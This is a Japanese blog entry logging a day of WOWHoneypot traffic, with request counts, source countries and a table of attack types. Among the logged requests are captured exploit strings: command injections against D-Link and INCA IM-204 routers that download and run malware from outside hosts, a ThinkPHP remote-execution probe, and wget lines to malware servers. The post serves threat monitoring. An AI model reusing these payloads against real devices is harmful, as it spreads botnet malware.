23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(155日目)

2019/08/18(日)

トータルは4060件でした。

ハンティングログは以下です。

106.12.10[.]203 wget hxxp[:]//54.37.74[.]232/sh

www.virustotal.com

89.248.174[.]219 wget hxxp[:]//89.248.174[.]219/bins/arm

www.virustotal.com

180.241.220[.]55 wget+hxxp[:]//185.172.110[.]224/mipsel

www.virustotal.com

IPのロケーション別の件数は以下です。

イタリア 4002
アメリ 11
中国 10
オランダ 7
ブラジル 6
インド 3
イラン 3
トルコ 3
ロシア 2
コロンビア 2
インドネシア 2
バングラデシュ 2
フランス 1
カナダ 1
タイ 1
スペイン 1
ギリシャ 1
ウクライナ 1
カンボジア 1

f:id:sec23:20190819144133p:plain

件数 概要 リクエス
4004 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
40 アクセス GET /
2 Tomcatの調査 GET /manager/text/list
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 phpMyAdminの調査 GET /pma2012/scripts/setup.php
1 phpMyAdminの調査 GET /phpmyadmin3/scripts/setup.php
1 phpMyAdminの調査 GET /phpmyadmin2/scripts/setup.php
1 phpMyAdminの調査 GET /phpmyadmin/index.php
1 phpMyAdminの調査 GET /index.php
1 D-Linkルーター脆弱性を狙った通信 GET /login.cgi?cli=aa%20aa%27;wget%20http://54.37.74.232/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
1 INCA IM-204の脆弱性を狙った通信 GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%cd%20%2Ftmp%2F%3B%20wget%20http%3A%2F%2F89.248.174.219%2Fbins%2Farm%3B%20chmod%20777%20arm%3B%20.%2Farm%20%26
1 INCA IM-204の脆弱性を狙った通信 GET /cgi-bin/webcm